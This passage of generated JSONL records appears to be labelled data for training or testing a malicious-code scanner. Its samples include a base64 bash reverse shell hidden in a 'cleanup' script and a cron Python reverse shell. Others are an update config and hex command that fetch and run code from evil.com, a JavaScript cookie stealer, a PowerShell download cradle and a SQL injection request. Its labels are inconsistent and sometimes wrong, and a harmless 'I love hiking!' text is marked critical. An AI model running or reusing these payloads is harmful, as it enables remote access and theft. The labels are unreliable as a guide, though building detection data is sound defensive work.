"Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00119", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00120", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.8d1a2d3d.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00121", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00122", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7de0=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x456f[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00123", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00124", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00125", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00126", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00127", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00128", "source": "hard_negatives", "source_license": "generated", "text": "var _0x1692=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x75d8[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00129", "source": "hard_negatives", "source_license": "generated", "text": "[2021-06-15 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00130", "source": "hard_negatives", "source_license": "generated", "text": "[2026-10-09 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00131", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00132", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.580ae991.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00133", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00134", "source": "hard_negatives", "source_license": "generated", "text": "var _0x4292=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x9396[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00135", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00136", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00137", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.4bf9722b.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00138", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00139", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00140", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00141", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7a7c=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6a1c[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00142", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00143", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00144", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00145", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00146", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00147", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00148", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00149", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00150", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00151", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00152", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00153", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.e1506e4c.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00154", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.256ae933.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00155", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.3a3ec151.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00156", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.1327bc77.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00157", "source": "hard_negatives", "source_license": "generated", "text": "[2023-04-23 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00158", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00159", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00160", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c9132b1b.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00161", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00162", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00163", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00164", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.8f57b24d.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00165", "source": "hard_negatives", "source_license": "generated", "text": "var _0x48d2=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xba77[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00166", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00167", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00168", "source": "hard_negatives", "source_license": "generated", "text": "var _0xf5cc=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xad97[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00169", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00170", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.1be3142f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00171", "source": "hard_negatives", "source_license": "generated", "text": "var _0xcb75=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xfe25[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00172", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00173", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.96a77941.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00174", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00175", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": 